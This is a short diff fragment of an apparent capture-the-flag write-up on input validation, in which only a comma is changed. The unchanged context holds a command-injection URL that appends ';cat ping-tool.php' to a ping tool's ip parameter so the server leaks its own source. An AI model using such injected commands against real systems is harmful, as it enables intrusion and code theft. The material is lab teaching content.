F3real/F3real.github.io/content/ryanCTF_inputValidation.md

 x.txt
 ```

-Now for fun we can also leak the code of this .php script running on the server with
+Now for fun, we can also leak the code of this .php script running on the server with

 ```http://ctf.ryanic.com:8080/ping-tool.php?ip=8.8.8.8;cat+ping-tool.php```